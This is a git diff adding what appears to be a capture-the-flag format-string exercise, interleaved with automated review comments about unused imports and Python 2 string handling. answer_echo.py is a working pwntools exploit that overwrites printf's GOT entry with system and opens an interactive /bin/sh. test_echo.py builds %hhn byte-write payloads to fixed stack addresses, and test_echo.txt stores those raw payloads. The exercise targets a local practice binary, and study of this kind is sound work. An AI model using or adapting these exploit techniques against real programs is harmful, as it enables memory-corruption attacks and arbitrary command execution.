diff --git a/format-string/echo/answer_echo.py b/format-string/echo/answer_echo.py
new file mode 100755
index 0000000..68bdd59
--- /dev/null
+++ b/format-string/echo/answer_echo.py
@@ -0,0 +1,19 @@
+#!/usr/bin/env python2
+from pwn import *
+from LibcSearcher import *
+from struct import pack
+import os, base64, math
+context(arch = "i386",os = "linux", log_level = "debug")
+
+p = process('./echo')
+elf = ELF('./echo')
+
+printf_got = elf.got['printf']
+system_plt = elf.plt['system']
+
+payload = fmtstr_payload(7, {printf_got: system_plt})
+
+p.sendline(payload)
+p.sendline("/bin/sh")
+p.interactive()
+
diff --git a/format-string/echo/echo b/format-string/echo/echo
new file mode 100755
index 0000000..71e0963
Binary files /dev/null and b/format-string/echo/echo differ
diff --git a/format-string/echo/test_echo.py b/format-string/echo/test_echo.py
new file mode 100755
index 0000000..e070d1c
--- /dev/null
+++ b/format-string/echo/test_echo.py
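Review bot: The names `LibcSearcher`, `pack`, `os`, `base64` and `math` are imported at the top of answer_echo.py but never referenced anywhere below, and the identical import block is duplicated in test_echo.py in the next hunk (where only `math` is actually used). Dropping the dead imports leaves `from pwn import *` as the one dependency this script needs, and removing `from struct import pack` also avoids silently replacing the `pack` helper that pwntools' star import appears to provide. A short header comment stating what the script assumes — the binary at `./echo` in the working directory and the fixed argument index `7` handed to `fmtstr_payload` — would spare the next reader from rediscovering those constants. `log_level = "debug"` in the `context(...)` call also reads like a leftover from development rather than something a finished solution should keep.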
@@ -0,0 +1,35 @@
+#!/usr/bin/env python2
+from pwn import *
+from LibcSearcher import *
+from struct import pack
+import os, base64, math
+context(arch = "i386",os = "linux", log_level = "debug")
+
+def gen_write_byte_format_string_i386(byte_value, write_address, fmtstr_shift_position, padding='0'):
+ # Placing: Align4(Padding Characters(Output_Count = byte_value), Fmtstr), Write Address
+ first_padding = padding * byte_value
+ flag = True
+ align_part_align_length = int(math.ceil(float(byte_value) / 4) + 2)
+ fmt_str = "%%%d$hhn" % (fmtstr_shift_position + align_part_align_length)
+ result_1 = first_padding + fmt_str
+ result_1 += (align_part_align_length * 4 - len(result_1)) * padding
+ result = result_1 + p32(write_address)
+ return result
+
+with open("answer_echo.txt", "w") as f:
+ f.write(gen_write_byte_format_string_i386(1, 0xffffce0c, 7))
+ f.write("\n")
+ f.write(gen_write_byte_format_string_i386(2, 0xffffce0d, 7))
+ f.write("\n")
+ f.write(gen_write_byte_format_string_i386(3, 0xffffce0e, 7))
+ f.write("\n")
+ f.write(gen_write_byte_format_string_i386(4, 0xffffce0f, 7))
+ f.write("\n")
+ f.write("exit")
+ f.write("\n")
+
+
+#p = process('./echo')
+#elf = ELF('./echo')
+
+
diff --git a/format-string/echo/test_echo.txt b/format-string/echo/test_echo.txt
new file mode 100644
index 0000000..bd359b0
--- /dev/null
+++ b/format-string/echo/test_echo.txt
@@ -0,0 +1,5 @@
+0%10$hhn0000 Îÿÿ
+00%10$hhn000 Îÿÿ
+000%10$hhn00Îÿÿ
+0000%10$hhn0Îÿÿ
+exit
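Review bot: `flag = True` inside gen_write_byte_format_string_i386 is assigned and never read, so it should simply be deleted. The script writes its output to `answer_echo.txt`, yet the artifact committed next to it in this change is `test_echo.txt` — if that file is meant to be this script's output, the path in `with open("answer_echo.txt", "w") as f:` should match it, otherwise the two will drift apart on the next regeneration. The text-mode write of the string returned by the function, which ends in `p32(write_address)`, only works under the `python2` shebang where str and bytes are one type; under Python 3 it raises TypeError, so either open with `"wb"` and encode the str parts or state the Python 2 requirement in a module docstring. The function also lacks a docstring; one sentence per parameter (byte_value, write_address, fmtstr_shift_position, padding) plus a line noting that the result is the padded format string followed by the packed address would make the `# Placing: ...` comment unnecessary.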